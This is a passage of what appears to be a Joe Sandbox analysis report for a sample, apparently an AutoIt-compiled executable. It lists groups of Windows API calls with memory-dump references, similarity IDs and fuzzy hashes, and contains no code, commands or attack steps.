                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0028C1EA
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0028C203
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0028C223
                                                          • ReleaseDC.USER32(?,00000000), ref: 0028C22E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: 8d816464cc8cca725dab50bd865c845f24fa742990e8617a6fcfb7e8e7517a73
                                                          • Instruction ID: 41948d1bb8bc447ad632fbade2f415b533204cd8f8ebda99c7eb134e99b6c874
                                                          • Opcode Fuzzy Hash: 8d816464cc8cca725dab50bd865c845f24fa742990e8617a6fcfb7e8e7517a73
                                                          • Instruction Fuzzy Hash: B8E03931544284AADB215FA8BC8DBD83B21EB05332F148366FA6D4C0E187B14995DB21
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 002A9339
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,002A8F04), ref: 002A9340
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002A8F04), ref: 002A934D
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,002A8F04), ref: 002A9354
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: 6c07526201cadf049c37d272bdb602990fda3d934adc6b3ad7fb109f4a61d665
                                                          • Instruction ID: f8464bc450ecb6f8d5d6b91172aa090d691a182c4a19b9d9ad303b6f48e2c01e
                                                          • Opcode Fuzzy Hash: 6c07526201cadf049c37d272bdb602990fda3d934adc6b3ad7fb109f4a61d665
                                                          • Instruction Fuzzy Hash: B9E086326412119FDB205FB2BD8DB5B3BBCEF517A1F104858B745CD090EA7894C6C750
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00290679
                                                          • GetDC.USER32(00000000), ref: 00290683
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002906A3
                                                          • ReleaseDC.USER32(?), ref: 002906C4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 16be8e5f13c56cf3ee3afac4d73961509a80eff395d16a074f382bff3e6f49f0
                                                          • Instruction ID: fe59746f14fac2c8ecca2453433959fe16c17575f74a95928de12d6c5ff831c0
                                                          • Opcode Fuzzy Hash: 16be8e5f13c56cf3ee3afac4d73961509a80eff395d16a074f382bff3e6f49f0
                                                          • Instruction Fuzzy Hash: 22E0E571850204EFCB019FA0E88CB5D7BB9EB8C311F118005FC5AAB210CBB885A29F54
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 0029068D
                                                          • GetDC.USER32(00000000), ref: 00290697
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002906A3
                                                          • ReleaseDC.USER32(?), ref: 002906C4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: eb5cb50df2939977bfb5db0e0ce1ac07c788327559b7a3416115e4765ba026e7
                                                          • Instruction ID: 4b6964c8153ee3b4aa76011ab778223bc45722be25b73580e03cf729a6f8f5e2
                                                          • Opcode Fuzzy Hash: eb5cb50df2939977bfb5db0e0ce1ac07c788327559b7a3416115e4765ba026e7
                                                          • Instruction Fuzzy Hash: 05E0E571840204AFCB019FA0E88C75D7BB5EB8C315F108004F959AB210CBB895928F50
                                                          APIs
                                                            • Part of subcall function 0026436A: _wcscpy.LIBCMT ref: 0026438D
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • __wcsnicmp.LIBCMT ref: 002BB670
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002BB739
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: f3d12e42ff19152599827007b6f4be7d0b1a9f14c165677a78f8ad671b001393
                                                          • Instruction ID: 07df3a6659abde7bef4e16829f558ddadae52b5fafc131ed1448933548825ca9
                                                          • Opcode Fuzzy Hash: f3d12e42ff19152599827007b6f4be7d0b1a9f14c165677a78f8ad671b001393
                                                          • Instruction Fuzzy Hash: 3A619176A20215AFCB15EF54C891EEEF7B4EF48340F108059F906AB391DBB0AE90DB54
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: #V&
                                                          • API String ID: 4104443479-4221984388
                                                          • Opcode ID: bf809631319aa2114eff79a018ba6740385a4794df114c0cec782cb21330a52d
                                                          • Instruction ID: 10a2321282753c99e6fe8fdf55f8fb69e8ad4bb8df0ab906fc669d35a37aa03a
                                                          • Opcode Fuzzy Hash: bf809631319aa2114eff79a018ba6740385a4794df114c0cec782cb21330a52d
                                                          • Instruction Fuzzy Hash: 77517270D2060ADFDF24CF68D884AAEBBF1FF44314F244529E85AD7250E731A9A5CB51
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 0025E01E
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0025E037
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: 519b60de08167733def22673bef99db578ffec7ffe2a6e153af53fcf2ebb6daa
                                                          • Instruction ID: 4e53a2a2da3ab0a13f7e0aeb47934c986b317674dd182ce72d2beceab25a7483
                                                          • Opcode Fuzzy Hash: 519b60de08167733def22673bef99db578ffec7ffe2a6e153af53fcf2ebb6daa
                                                          • Instruction Fuzzy Hash: 285179714187449BE320AF10E885BABB7F8FB84359F91489CF6D8411A1DB70957CCB1A
                                                          APIs
                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002D8186
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D819B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: c9d34d7d87ef76fe9909aaac34926f2b035860183f97c60160f5b8066750480b
                                                          • Instruction ID: 350a2592e5d116a3a1c2bbd2a47e3ecfb08bbbc0ad9d626caef5687bbf43983b
                                                          • Opcode Fuzzy Hash: c9d34d7d87ef76fe9909aaac34926f2b035860183f97c60160f5b8066750480b
                                                          • Instruction Fuzzy Hash: 12410A74A1120A9FDB14CF64C881BDA7BB9FB09300F14416AE908AB391DB71AD56CF90
                                                          APIs
                                                          • _memset.LIBCMT ref: 002C2C6A
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002C2CA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          • Opcode ID: 1443380830b6514d809474d8bd3003a7e9032fc2c6d836c6f062c61e0b273e9c
                                                          • Instruction ID: 08740bfcf7962a908b97605c255ccc232618eeeb3619d587e8b6907e33eb2fb9
                                                          • Opcode Fuzzy Hash: 1443380830b6514d809474d8bd3003a7e9032fc2c6d836c6f062c61e0b273e9c
                                                          • Instruction Fuzzy Hash: 0A310771820119ABCF01AFA4CC85AEEBBB9FF14300F140159E815A6262DA716966DFA0
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 002D713C
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002D7178
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 41777f49cb0b952d4c2afc60a1c96640a9704dd2f13fcc46753c577dbf466265
                                                          • Instruction ID: 8e300294c7bd548c2ca8a6363e38935471546cabe2c141db919063fb5948f50c
                                                          • Opcode Fuzzy Hash: 41777f49cb0b952d4c2afc60a1c96640a9704dd2f13fcc46753c577dbf466265
                                                          • Instruction Fuzzy Hash: D731C171120604AEDB119F74CC80BFB73B9FF48724F00861AF99987291EB34ACA1CB60
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B30B8
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002B30F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 7199d5fbaa4a64cea2ed3dfde5193c9d26379ce88ea8ced9ddcb154302136728
                                                          • Instruction ID: 815484ae9f90c61d3bdca0d4e5ddc96f4f376a898cd3d59965f33de9a763c85c
                                                          • Opcode Fuzzy Hash: 7199d5fbaa4a64cea2ed3dfde5193c9d26379ce88ea8ced9ddcb154302136728
                                                          • Instruction Fuzzy Hash: 2531C8315302069BEB24DF5CC885BEEBBBCEF053D0F188019E88996191D7709B64CF51
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 002C4132
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                          • API String ID: 3506404897-2584243854
                                                          • Opcode ID: 5671ec2438131a7ec71d7462fe567beff63bc50cb8fb095056a763f8410c4d8d
                                                          • Instruction ID: 3705f0a27c0ce152061ed6f5ae58b068a9e4ffa61c68d8809a8823c5f9ee9730
                                                          • Opcode Fuzzy Hash: 5671ec2438131a7ec71d7462fe567beff63bc50cb8fb095056a763f8410c4d8d
                                                          • Instruction Fuzzy Hash: 3521C370A20219AFCF11EF64C8A5FEE77B5AF54341F080459F948A7281DB70A9A5CFA1
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002D6D86
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D6D91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 1b47dcfc50d5d5dc7b6fd6178accb14a57249deb3b7551ac252f5f74d5d6cccf
                                                          • Instruction ID: 808ac86779ba69b138d8f1d451716b417ac5864d19b4138338f2576215066a30
                                                          • Opcode Fuzzy Hash: 1b47dcfc50d5d5dc7b6fd6178accb14a57249deb3b7551ac252f5f74d5d6cccf
                                                          • Instruction Fuzzy Hash: 7811B671320209AFEF118F54EC85FFB3B6BEB98364F114126F9149B390D6719C618B60
                                                          APIs
                                                            • Part of subcall function 00252111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025214F
                                                            • Part of subcall function 00252111: GetStockObject.GDI32(00000011), ref: 00252163
                                                            • Part of subcall function 00252111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025216D
                                                          • GetWindowRect.USER32(00000000,?), ref: 002D7296
                                                          • GetSysColor.USER32(00000012), ref: 002D72B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: dfb08ccd20c0d1ee12a8323473b4eb1d43f7fd60c585b0ff3683a83c59adc5dd
                                                          • Instruction ID: 69a2fa43ba6f5869b601c9f8c80dc73d9ab0c63ecd8577aa9c35c7fa3b7d7eeb
                                                          • Opcode Fuzzy Hash: dfb08ccd20c0d1ee12a8323473b4eb1d43f7fd60c585b0ff3683a83c59adc5dd
                                                          • Instruction Fuzzy Hash: F221477262424AAFDB04DFB8CC89AFA7BA8FB08314F00451AFD55D3251E674A8A19B50
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B31C9
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002B31E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: e670087c44b72a0e78518f5d2ad6fd3cca68ec556c1db004ad95eb6c98d74307
                                                          • Instruction ID: 81af258ef0c56ad8e318e385293233981d43e29126e9fa6a68448ed7b75b17df
                                                          • Opcode Fuzzy Hash: e670087c44b72a0e78518f5d2ad6fd3cca68ec556c1db004ad95eb6c98d74307
                                                          • Instruction Fuzzy Hash: 3411E235931116ABDB21DE9CDC45BED77BCAB09390F184121E81AE72A0D770AF15CBA1
                                                          APIs
                                                          • DeleteObject.GDI32(?), ref: 0025351D
                                                          • DestroyWindow.USER32(?,?,00264E61), ref: 00253576
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: DeleteDestroyObjectWindow
                                                          • String ID: h.
                                                          • API String ID: 2587070983-3029464332
                                                          • Opcode ID: a236b90edcc6f948fc5cf0e3dc5b21a0cec75b6d62dad9e4d2f4133ef985f929
                                                          • Instruction ID: 5c0f1e48c09d6e7e36a39807399342fa2813e01801f5233e1ec85b489a771cbb
                                                          • Opcode Fuzzy Hash: a236b90edcc6f948fc5cf0e3dc5b21a0cec75b6d62dad9e4d2f4133ef985f929
                                                          • Instruction Fuzzy Hash: 892154346292018FCB1ADF19EC5977533F8AB4C352F48A159EC068B2A0DB70DE69CF49
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002C28F8
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002C2921
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: d428c7b07da439bf130e278155b3fcc84ad2a5b8f90c6f2652f8b0b7bd43116d
                                                          • Instruction ID: 543590033b592b683b8700d2dfafd5dbb56ea8cf810d7483272af660b5e64cdf
                                                          • Opcode Fuzzy Hash: d428c7b07da439bf130e278155b3fcc84ad2a5b8f90c6f2652f8b0b7bd43116d
                                                          • Instruction Fuzzy Hash: AB119170511226FAEB258E518C89FB6FB68EF05751F10832EF54556140EBB058A9D6F0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp
                                                          • String ID: 0.0.0.0$L,.
                                                          • API String ID: 856254489-1466378779
                                                          • Opcode ID: 2878beb8f4c521938c71079ab8903686723e2517dc7d64a1e9415db0f1dc4963
                                                          • Instruction ID: 47b683c845c3d16128985b72ecdfe3356670ea442580cfe3ed9ff67245360e09
                                                          • Opcode Fuzzy Hash: 2878beb8f4c521938c71079ab8903686723e2517dc7d64a1e9415db0f1dc4963
                                                          • Instruction Fuzzy Hash: 5E11B2352302059FCB04EE19C881ED9B7B8AF45714F50C099E90D5B3A1DA70EDA6CB64
                                                          APIs
